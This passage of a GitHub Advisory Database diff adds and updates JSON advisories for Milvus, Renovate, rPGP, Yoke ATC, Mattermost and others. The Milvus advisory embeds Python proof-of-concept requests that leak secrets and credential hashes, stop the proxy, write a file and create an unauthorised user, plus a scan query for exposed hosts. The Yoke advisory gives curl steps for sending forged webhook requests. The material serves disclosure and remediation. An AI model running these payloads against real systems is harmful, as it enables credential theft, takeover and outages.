+ "cwe_ids": [
+ "CWE-200",
+ "CWE-640"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T22:49:27Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json b/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json
index a071acda2440b..bb867f815572c 100644
--- a/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json
+++ b/advisories/github-reviewed/2026/02/GHSA-7ppg-37fh-vcr6/GHSA-7ppg-37fh-vcr6.json
@@ -1,9 +1,11 @@
{
"schema_version": "1.4.0",
"id": "GHSA-7ppg-37fh-vcr6",
- "modified": "2026-02-11T19:49:44Z",
+ "modified": "2026-02-13T17:17:11Z",
"published": "2026-02-11T19:49:44Z",
- "aliases": [],
+ "aliases": [
+ "CVE-2026-26190"
+ ],
"summary": "Milvus: Unauthenticated Access to Restful API on Metrics Port (9091) Leads to Critical System Compromise",
"details": "## Summary\n\nMilvus exposes TCP port 9091 by default with two critical authentication bypass vulnerabilities:\n\n1. The `/expr` debug endpoint uses a weak, predictable default authentication token derived from `etcd.rootPath` (default: `by-dev`), enabling arbitrary expression evaluation.\n2. The full REST API (`/api/v1/*`) is registered on the metrics/management port without any authentication, allowing unauthenticated access to all business operations including data manipulation and credential management.\n\n## Details\n\n### Vulnerability 1: Weak Default Authentication on `/expr` Endpoint\n\nThe `/expr` endpoint on port 9091 accepts an `auth` parameter that defaults to the `etcd.rootPath` value (`by-dev`). This value is well-known and predictable. An attacker who can reach port 9091 can evaluate arbitrary internal Go expressions, leading to:\n\n- **Information/Credential Disclosure**: Reading internal configuration values (MinIO secrets, etcd credentials) and user credential hashes via `param.MinioCfg.SecretAccessKey.GetValue()`, `rootcoord.meta.GetCredential(ctx, 'root')`, etc.\n- **Denial of Service**: Invoking `proxy.Stop()` to shut down the proxy service.\n- **Arbitrary File Write (potential RCE)**: Manipulating access log configuration parameters to write arbitrary content to arbitrary file paths on the server filesystem.\n\n### Vulnerability 2: Unauthenticated REST API on Metrics Port\n\nBusiness-logic HTTP handlers (collection management, data insertion, credential management) are registered on the metrics/management HTTP server at port 9091 via `registerHTTPServer()` in [`internal/distributed/proxy/service.go` (line 170)](https://github.com/milvus-io/milvus/blob/9996e8d1cebff7e7108bcb16d43124236de77438/internal/distributed/proxy/service.go#L170). These endpoints do not enforce any authentication, even when Milvus authentication is enabled on the primary gRPC/HTTP ports.\n\nAn attacker can perform any business operation without credentials, including:\n\n- Creating, listing, and deleting collections\n- Inserting and querying data\n- Creating, listing, and deleting user credentials\n- Modifying user passwords\n\n## Proof of Concept\n\n### PoC 1 — `/expr` Endpoint Exploitation\n\n```python\nimport requests\n\nurl = \"http://:9091/expr\"\n\n# Leak sensitive configuration (e.g., MinIO secret key)\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"param.MinioCfg.SecretAccessKey.GetValue()\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Retrieve hashed credentials for the root user\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"rootcoord.meta.GetCredential(ctx, 'root')\"\n}, timeout=5)\nprint(res.json().get(\"output\", \"\"))\n\n# Denial of Service — stop the proxy\nres = requests.get(url, params={\n \"auth\": \"by-dev\",\n \"code\": \"proxy.Stop()\"\n}, timeout=5)\n\n# Arbitrary file write (potential RCE)\nfor cmd in [\n 'param.Save(\"proxy.accessLog.localPath\", \"/tmp\")',\n 'param.Save(\"proxy.accessLog.formatters.base.format\", \"whoami\")',\n 'param.Save(\"proxy.accessLog.filename\", \"evil.sh\")',\n 'querycoord.etcdCli.KV.Put(ctx, \"by-dev/config/proxy/accessLog/enable\", \"true\")'\n]:\n requests.get(url, params={\"auth\": \"by-dev\", \"code\": cmd}, timeout=5)\n```\n\n### PoC 2 — Unauthenticated REST API Access\n\n```python\nimport requests\n\ntarget_url = \"http://:9091\"\n\n# Create a user without any authentication\nres = requests.post(f\"{target_url}/api/v1/credential\", json={\n \"username\": \"attacker_user\",\n \"password\": \"MTIzNDU2Nzg5\",\n})\nprint(res.json())\n\n# List all users\nres = requests.get(f\"{target_url}/api/v1/credential/users\")\nprint(res.json()) # {'status': {}, 'usernames': ['root', 'attacker_user']}\n\n# Create and delete collections, insert data — all without authentication\n```\n\n## Internet Exposure\n\nA significant number of publicly exposed Milvus instances are discoverable via internet-wide scanning using the pattern:\n\n```\nhttp.body=\"404 page not found\" && port=\"9091\"\n```\n\nThis indicates the vulnerability is actively exploitable in real-world production environments.\n\n## Impact\n\nAn unauthenticated remote attacker with network access to port 9091 can:\n\n1. **Exfiltrate secrets and credentials** — MinIO keys, etcd credentials, user password hashes, and all internal configuration values.\n2. **Manipulate all data** — Create, modify, and delete collections, insert or remove data, bypassing all application-level access controls.\n3. **Manage user accounts** — Create administrative users, reset passwords, and escalate privileges.\n4. **Cause denial of service** — Shut down proxy services, drop databases, or corrupt metadata.\n5. **Write arbitrary files** — Potentially achieve remote code execution by writing malicious files to the filesystem via access log configuration manipulation.\n\n## Remediation\n\n### Recommended Fixes\n\n1. **Remove or disable the `/expr` endpoint** in production builds. If retained for debugging, it must require strong, non-default authentication and be disabled by default.\n2. **Do not register business API routes on the metrics port.** Separate the metrics/health endpoints from the application REST API to ensure authentication middleware applies consistently.\n3. **Bind port 9091 to localhost by default** (`127.0.0.1:9091`) so it is not externally accessible unless explicitly configured.\n4. **Enforce authentication on all API endpoints**, regardless of which port they are served on.\n\n### User Mitigations (until patched)\n\n- Block external access to port 9091 using firewall rules or network policies.\n- If running in Docker/Kubernetes, do not expose port 9091 outside the internal network.\n- Change the `etcd.rootPath` from the default value `by-dev` to a strong, random value (partial mitigation only — does not address the unauthenticated REST API).\n\n## Credit\n\nThis vulnerability was discovered and responsibly reported by **YingLin Xie** (xieyinglin@hust.edu.cn). It was independently reported by [0x1f](https://github.com/0x1f) and zznQ ([ac0d3r](https://github.com/ac0d3r)).",
"severity": [
diff --git a/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json b/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json
index b654c6ebe59a7..277f68bdc730a 100644
--- a/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json
+++ b/advisories/github-reviewed/2026/02/GHSA-87fh-rc96-6fr6/GHSA-87fh-rc96-6fr6.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-87fh-rc96-6fr6",
- "modified": "2026-02-07T00:32:04Z",
+ "modified": "2026-02-13T17:16:07Z",
"published": "2026-02-05T21:19:30Z",
"aliases": [
"CVE-2026-25758"
@@ -140,6 +140,10 @@
"type": "WEB",
"url": "https://github.com/spree/spree/commit/ff7cfcfcfe0c40c60d03317e1d0ee361c6a6b054"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/spree_api/CVE-2026-25758.yml"
+ },
{
"type": "PACKAGE",
"url": "https://github.com/spree/spree"
diff --git a/advisories/github-reviewed/2026/02/GHSA-8h58-w33p-wq3g/GHSA-8h58-w33p-wq3g.json b/advisories/github-reviewed/2026/02/GHSA-8h58-w33p-wq3g/GHSA-8h58-w33p-wq3g.json
new file mode 100644
index 0000000000000..b662a0da07183
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-8h58-w33p-wq3g/GHSA-8h58-w33p-wq3g.json
@@ -0,0 +1,63 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8h58-w33p-wq3g",
+ "modified": "2026-02-13T20:54:27Z",
+ "published": "2026-02-13T20:54:27Z",
+ "aliases": [],
+ "summary": "rPGP affected by crash in message handling for deeply nested messages",
+ "details": "### Summary\nPrevious rPGP versions could be caused to crash with a \"stack overflow\" when parsing messages that contain deeply nested message layers, such as messages with many signatures.\n\nrPGP 0.19.0 resolves this issue with a more robust message handling implementation (via https://github.com/rpgp/rpgp/pull/625).\n\n### Impact\nAn attacker could cause applications to crash in rPGP's message parsing subsystem, when applications attempt to ingest messages.\n\n### Attribution\nDiscovered internally during rPGP development, using a fuzz test suite previously contributed by Christian Reitter.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "crates.io",
+ "name": "pgp"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0.16.0-alpha.0"
+ },
+ {
+ "fixed": "0.19.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/rpgp/rpgp/security/advisories/GHSA-8h58-w33p-wq3g"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rpgp/rpgp/pull/625"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rpgp/rpgp/commit/e82f2c7494ba277d62fd372d69b2c008473bbef8"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/rpgp/rpgp"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-121"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:54:27Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-8wc6-vgrq-x6cf/GHSA-8wc6-vgrq-x6cf.json b/advisories/github-reviewed/2026/02/GHSA-8wc6-vgrq-x6cf/GHSA-8wc6-vgrq-x6cf.json
new file mode 100644
index 0000000000000..bf8e663ee6057
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-8wc6-vgrq-x6cf/GHSA-8wc6-vgrq-x6cf.json
@@ -0,0 +1,82 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8wc6-vgrq-x6cf",
+ "modified": "2026-02-13T20:53:58Z",
+ "published": "2026-02-13T20:53:58Z",
+ "aliases": [],
+ "summary": "Child processes spawned by Renovate incorrectly have full access to environment variables",
+ "details": "When Renovate spawns child processes, their access to environment variables is filtered to an allowlist, to prevent unauthorized access to privileged credentials that the Renovate process has access to.\n\nSince [42.68.1](https://github.com/renovatebot/renovate/releases/tag/42.68.1) (2025-12-30), this filtering had been **inadvertently removed**, and so any child processes spawned from these versions will have had access to any environment variables that Renovate has access to.\n\nThis could lead to [insider attackers](https://docs.renovatebot.com/security-and-permissions/#execution-of-code-insider-attack) and [outside attackers](https://docs.renovatebot.com/security-and-permissions/#execution-of-code-outsider-attack) being able to exflitrate secrets from the Renovate deployment.\n\nIt is recommended to rotate (+ revoke) any credentials that Renovate has access to, in case any spawned child processes have attempted to exfiltrate any secrets.\n\n## Impact\n\nChild processes spawned by Renovate (i.e. `npm install`, anything defined in [`postUpgradeTasks`](https://docs.renovatebot.com/configuration-options/#postupgradetasks) or [`postUpdateOptions`](https://docs.renovatebot.com/configuration-options/#postupdateoptions)) will have full access to the environment variables that the Renovate process has. \n\nThis could lead to [insider attackers](https://docs.renovatebot.com/security-and-permissions/#execution-of-code-insider-attack) and [outside attackers](https://docs.renovatebot.com/security-and-permissions/#execution-of-code-outsider-attack) being able to exflitrate secrets from the Renovate deployment.\n\n## Patches\n\nThis is patched in [42.96.3](https://github.com/renovatebot/renovate/releases/tag/42.96.3) and [43.4.4](https://github.com/renovatebot/renovate/releases/tag/43.4.4).\n\n## Workarounds\n\nThere are no workarounds, other than upgrading your Renovate version.\n\n## Why did this happen?\n\nAs part of work towards https://github.com/renovatebot/renovate/security/advisories/GHSA-pfq2-hh62-7m96, one of the [preparatory changes](https://github.com/renovatebot/renovate/pull/40212) we made was moving to [`execa`](https://www.npmjs.com/package/execa).\n\nOne of the default behaviours of `execa` is to [extend the process' environment variables with any new ones](https://github.com/sindresorhus/execa/tree/v8.0.1?tab=readme-ov-file#extendenv), rather than override them.\n\nThis was missed in code review, which meant that since this version, the full environment variables have been provided to any child processes spawned with `execa` by Renovate.\n\nThis was discovered as part of an unrelated change.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "renovate"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "42.68.1"
+ },
+ {
+ "fixed": "42.96.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "renovate"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "43.0.0"
+ },
+ {
+ "fixed": "43.4.4"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-8wc6-vgrq-x6cf"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/renovatebot/renovate"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/renovatebot/renovate/releases/tag/42.96.3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/renovatebot/renovate/releases/tag/43.4.4"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-269"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:53:58Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json b/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json
index d2ecb5f8b36fb..3abcd13dcb9ec 100644
--- a/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json
+++ b/advisories/github-reviewed/2026/02/GHSA-965m-v4cc-6334/GHSA-965m-v4cc-6334.json
@@ -1,14 +1,19 @@
{
"schema_version": "1.4.0",
"id": "GHSA-965m-v4cc-6334",
- "modified": "2026-02-12T22:06:36Z",
+ "modified": "2026-02-13T17:15:36Z",
"published": "2026-02-12T22:06:36Z",
"aliases": [
"CVE-2026-26055"
],
"summary": "Unauthenticated Admission Webhook Endpoints in Yoke ATC",
"details": "# Unauthenticated Admission Webhook Endpoints in Yoke ATC\n\nThis vulnerability exists in the Air Traffic Controller (ATC) component of Yoke, a Kubernetes deployment tool. The ATC webhook endpoints lack proper authentication mechanisms, allowing any pod within the cluster network to directly send AdmissionReview requests to the webhook, bypassing Kubernetes API Server authentication. This enables attackers to trigger WASM module execution in the ATC controller context without proper authorization.\n\n**Recommended CWE**: CWE-306 (Missing Authentication for Critical Function)\n\n## Summary\n\nYoke ATC implements multiple Admission Webhook endpoints (`/validations/{airway}`, `/validations/resources`, `/validations/flights.yoke.cd`, `/validations/airways.yoke.cd`, etc.) that process AdmissionReview requests. These endpoints do not implement TLS client certificate authentication or request source validation. Any client that can reach the ATC service within the cluster can send requests directly to these endpoints, bypassing the Kubernetes API Server's authentication and authorization mechanisms.\n\n## Details\n\nThe vulnerability exists in the HTTP handler implementation where webhook endpoints accept and process requests without verifying the client identity.\n\n**Vulnerable Endpoint Handlers** (`cmd/atc/handler.go:147-335`):\n```go\nmux.HandleFunc(\"POST /validations/{airway}\", func(w http.ResponseWriter, r *http.Request) {\n var review admissionv1.AdmissionReview\n if err := json.NewDecoder(r.Body).Decode(&review); err != nil {\n http.Error(w, fmt.Sprintf(\"failed to decode review: %v\", err), http.StatusBadRequest)\n return\n }\n // No authentication check - request is processed directly\n // ...\n})\n```\n\n**Additional Unauthenticated Endpoints**:\n- `/validations/resources` (`cmd/atc/handler.go:337-538`)\n- `/validations/external-resources` (`cmd/atc/handler.go:540-597`)\n- `/validations/airways.yoke.cd` (`cmd/atc/handler.go:599-636`)\n- `/validations/flights.yoke.cd` (`cmd/atc/handler.go:638-733`)\n- `/crdconvert/{airway}` (`cmd/atc/handler.go:61-145`)\n\nThe code lacks:\n1. TLS client certificate verification\n2. Request source validation (verifying requests come from kube-apiserver)\n3. Any form of authentication middleware\n\n## PoC\n\n### Environment Setup\n\n**Prerequisites**:\n- Docker installed and running\n- kubectl installed\n- Go 1.21+ installed\n- kind installed\n\n**Step 1: Create Kind cluster**\n```bash\ncat > /tmp/kind-config.yaml << 'EOF'\nkind: Cluster\napiVersion: kind.x-k8s.io/v1alpha4\nname: yoke-vuln-test\nnodes:\n- role: control-plane\nEOF\n\nkind create cluster --config /tmp/kind-config.yaml\n```\n\n**Step 2: Build and install Yoke CLI**\n```bash\ngit clone https://github.com/yokecd/yoke.git\ncd yoke\nGOPROXY=direct GOSUMDB=off go build -o /tmp/yoke ./cmd/yoke\n```\n\n**Step 3: Deploy ATC**\n```bash\n/tmp/yoke takeoff --create-namespace --namespace atc -wait 120s atc oci://ghcr.io/yokecd/atc-installer:latest\n```\n\n**Step 4: Deploy Backend Airway example**\n```bash\n/tmp/yoke takeoff -wait 60s backendairway \"https://github.com/yokecd/examples/releases/download/latest/atc_backend_airway.wasm.gz\"\n```\n\n### Exploitation Steps\n\n**Step 1: Create attacker pod**\n```bash\nkubectl apply -f - < /tmp/malicious-review.json << 'EOF'\n{\n \"apiVersion\": \"admission.k8s.io/v1\",\n \"kind\": \"AdmissionReview\",\n \"request\": {\n \"uid\": \"vul002-exploit-uid\",\n \"kind\": {\"group\": \"examples.com\", \"version\": \"v1\", \"kind\": \"Backend\"},\n \"resource\": {\"group\": \"examples.com\", \"version\": \"v1\", \"resource\": \"backends\"},\n \"name\": \"exploit-backend\",\n \"namespace\": \"default\",\n \"operation\": \"CREATE\",\n \"userInfo\": {\"username\": \"attacker-from-pod\", \"groups\": [\"system:unauthenticated\"]},\n \"object\": {\n \"apiVersion\": \"examples.com/v1\",\n \"kind\": \"Backend\",\n \"metadata\": {\"name\": \"exploit-backend\", \"namespace\": \"default\"},\n \"spec\": {\"image\": \"nginx:latest\", \"replicas\": 1}\n }\n }\n}\nEOF\n\nkubectl cp /tmp/malicious-review.json webhook-attacker:/tmp/malicious-review.json\n```\n\nSend the request:\n```bash\nkubectl exec webhook-attacker -- curl -k -s -X POST \\\n https://atc-atc.atc.svc.cluster.local:80/validations/backends.examples.com \\\n -H \"Content-Type: application/json\" \\\n -d @/tmp/malicious-review.json\n```\n\nActual output from verification:\n```json\n{\"kind\":\"AdmissionReview\",\"apiVersion\":\"admission.k8s.io/v1\",\"request\":{\"uid\":\"vul002-normal-test\",\"kind\":{\"group\":\"examples.com\",\"version\":\"v1\",\"kind\":\"Backend\"},\"resource\":{\"group\":\"examples.com\",\"version\":\"v1\",\"resource\":\"backends\"},\"name\":\"vul002-normal-backend\",\"namespace\":\"default\",\"operation\":\"CREATE\",\"userInfo\":{\"username\":\"attacker-from-pod\",\"groups\":[\"system:unauthenticated\"]},\"object\":{\"apiVersion\":\"examples.com/v1\",\"kind\":\"Backend\",\"metadata\":{\"name\":\"vul002-normal-backend\",\"namespace\":\"default\"},\"spec\":{\"image\":\"nginx:latest\",\"replicas\":1}},\"oldObject\":null,\"options\":null},\"response\":{\"uid\":\"vul002-normal-test\",\"allowed\":false,\"status\":{\"metadata\":{},\"status\":\"Failure\",\"message\":\"applying resource returned errors during dry-run...\"}}}\n```\n\n**Step 4: Verify ATC logs**\n```bash\nkubectl logs -n atc deployment/atc-atc --tail=20 | grep backends.examples.com\n```\n\nActual log output:\n```json\n{\"time\":\"2026-02-01T15:29:08.890991543Z\",\"level\":\"INFO\",\"msg\":\"request served\",\"component\":\"server\",\"code\":200,\"method\":\"POST\",\"path\":\"/validations/backends.examples.com\",\"elapsed\":\"435ms\",\"validation\":{\"allowed\":false,\"status\":\"Invalid\"}}\n```\n\nThe `elapsed: 435ms` indicates WASM module execution occurred.\n\n### Expected Result\n\nThe attacker pod successfully sends AdmissionReview requests directly to the ATC webhook endpoint without any authentication. The ATC controller processes the request and executes the WASM module, proving that:\n1. No TLS client certificate is required\n2. No request source validation occurs\n3. The fake `userInfo` is accepted without verification\n4. WASM modules are executed based on unauthenticated requests\n\n## Impact\n\n**Vulnerability Type**: Missing Authentication / Authentication Bypass\n\n**Attack Prerequisites**:\n- Attacker has access to a pod within the cluster network\n- Network policies do not restrict access to the ATC service (common in default configurations)\n\n**Impact Assessment**:\n- **Confidentiality**: Medium - Attacker can trigger WASM execution which may access controller context data\n- **Integrity**: High - Combined with VUL-001, attacker can create arbitrary Kubernetes resources\n- **Availability**: Medium - Attacker can cause resource exhaustion through repeated requests\n\n**Attack Scenario**:\n1. Attacker compromises a pod or gains access to the cluster network\n2. Attacker sends crafted AdmissionReview requests directly to ATC webhook\n3. ATC processes requests without verifying they came from the API Server\n4. Combined with annotation injection (VUL-001), attacker can execute arbitrary WASM code\n5. Malicious WASM can create resources or exfiltrate data using ATC's cluster-admin privileges\n\n## Severity\n\n**CVSS v3.1 Score**: 7.5 (High)\n\n**Vector**: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n\n- Attack Vector (AV): Network - Accessible from cluster network\n- Attack Complexity (AC): Low - Simple HTTP request\n- Privileges Required (PR): None - No authentication required\n- User Interaction (UI): None - Automatic processing\n- Scope (S): Unchanged\n- Confidentiality (C): None - Direct impact limited\n- Integrity (I): High - Can trigger unauthorized WASM execution\n- Availability (A): None - No direct availability impact\n\nNote: When combined with VUL-001, the overall impact increases significantly.\n\n## Affected Versions\n\n- Yoke ATC v0.18.x and earlier versions\n- All versions that implement Admission Webhook endpoints without client authentication\n\n## Patched Versions\n\nNo patch available at time of disclosure.\n\n## Workarounds\n\n1. **Network Policy**: Deploy NetworkPolicy to restrict access to ATC service, allowing only kube-apiserver to connect\n```yaml\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n name: atc-webhook-policy\n namespace: atc\nspec:\n podSelector:\n matchLabels:\n yoke.cd/app: atc\n policyTypes:\n - Ingress\n ingress:\n - from:\n - namespaceSelector:\n matchLabels:\n kubernetes.io/metadata.name: kube-system\n podSelector:\n matchLabels:\n component: kube-apiserver\n```\n\n2. **Service Mesh**: Use a service mesh (Istio, Linkerd) to enforce mTLS between services\n\n3. **Pod Security**: Implement strict pod security policies to limit which pods can be created in the cluster\n\n## References\n\n- Yoke Project: https://github.com/yokecd/yoke\n- Kubernetes Admission Webhooks: https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/\n- CWE-306: Missing Authentication for Critical Function: https://cwe.mitre.org/data/definitions/306.html\n\n## Credits\ncredit for:\n@b0b0haha (603571786@qq.com)\n@lixingquzhi (mayedoushidalao@163.com)",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
+ }
+ ],
"affected": [
{
"package": {
@@ -35,6 +40,10 @@
"type": "WEB",
"url": "https://github.com/yokecd/yoke/security/advisories/GHSA-965m-v4cc-6334"
},
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26055"
+ },
{
"type": "PACKAGE",
"url": "https://github.com/yokecd/yoke"
@@ -51,6 +60,6 @@
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2026-02-12T22:06:36Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-12T22:16:06Z"
}
}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json b/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json
index f05345733c000..c4b1a394cd1e4 100644
--- a/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json
+++ b/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-9f3f-wv7r-qc8r",
- "modified": "2026-02-12T22:07:22Z",
+ "modified": "2026-02-13T14:18:28Z",
"published": "2026-02-11T15:13:12Z",
"aliases": [
"CVE-2026-26014"
@@ -25,13 +25,16 @@
"type": "ECOSYSTEM",
"events": [
{
- "introduced": "0"
+ "introduced": "3.1.0"
},
{
- "fixed": "3.1.0"
+ "fixed": "3.1.1"
}
]
}
+ ],
+ "versions": [
+ "3.1.0"
]
},
{
@@ -71,6 +74,25 @@
]
}
]
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/pion/dtls/v3"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "3.0.11"
+ }
+ ]
+ }
+ ]
}
],
"references": [
@@ -90,13 +112,21 @@
"type": "WEB",
"url": "https://github.com/pion/dtls/commit/61762dee8217991882c5eb79856b9e7a73ee349f"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/pion/dtls/commit/90e241cfec2985715efdd3d005972847462a67d6"
+ },
{
"type": "PACKAGE",
"url": "https://github.com/pion/dtls"
},
{
"type": "WEB",
- "url": "https://github.com/pion/dtls/releases/tag/v3.1.0"
+ "url": "https://github.com/pion/dtls/releases/tag/v3.0.11"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/pion/dtls/releases/tag/v3.1.1"
}
],
"database_specific": {
diff --git a/advisories/github-reviewed/2026/02/GHSA-9pj7-jh2r-87g8/GHSA-9pj7-jh2r-87g8.json b/advisories/github-reviewed/2026/02/GHSA-9pj7-jh2r-87g8/GHSA-9pj7-jh2r-87g8.json
new file mode 100644
index 0000000000000..43f98ba4f0d5e
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-9pj7-jh2r-87g8/GHSA-9pj7-jh2r-87g8.json
@@ -0,0 +1,108 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9pj7-jh2r-87g8",
+ "modified": "2026-02-13T20:56:15Z",
+ "published": "2026-02-13T12:31:21Z",
+ "aliases": [
+ "CVE-2026-22892"
+ ],
+ "summary": "Mattermost doesn't validate user permissions when creating Jira issues from Mattermost posts",
+ "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 fail to validate user permissions when creating Jira issues from Mattermost posts, which allows an authenticated attacker with access to the Jira plugin to read post content and attachments from channels they do not have access to via the /create-issue API endpoint by providing the post ID of an inaccessible post.. Mattermost Advisory ID: MMSA-2025-00550",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/mattermost/mattermost-server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "11.2.0"
+ },
+ {
+ "fixed": "11.2.2"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 11.2.1"
+ }
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/mattermost/mattermost-server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "11.1.0"
+ },
+ {
+ "fixed": "11.1.3"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 11.1.2"
+ }
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/mattermost/mattermost-server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "10.11.0"
+ },
+ {
+ "fixed": "10.11.10"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 10.11.9"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22892"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/mattermost/mattermost"
+ },
+ {
+ "type": "WEB",
+ "url": "https://mattermost.com/security-updates"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-863"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-13T20:56:15Z",
+ "nvd_published_at": "2026-02-13T11:16:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-c7ph-f7jm-xv4w/GHSA-c7ph-f7jm-xv4w.json b/advisories/github-reviewed/2026/02/GHSA-c7ph-f7jm-xv4w/GHSA-c7ph-f7jm-xv4w.json
new file mode 100644
index 0000000000000..03870e3d5e003
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-c7ph-f7jm-xv4w/GHSA-c7ph-f7jm-xv4w.json
@@ -0,0 +1,55 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c7ph-f7jm-xv4w",
+ "modified": "2026-02-13T20:55:20Z",
+ "published": "2026-02-13T20:55:20Z",
+ "aliases": [],
+ "summary": "rPGP's integrity protection of encrypted data was not always checked",
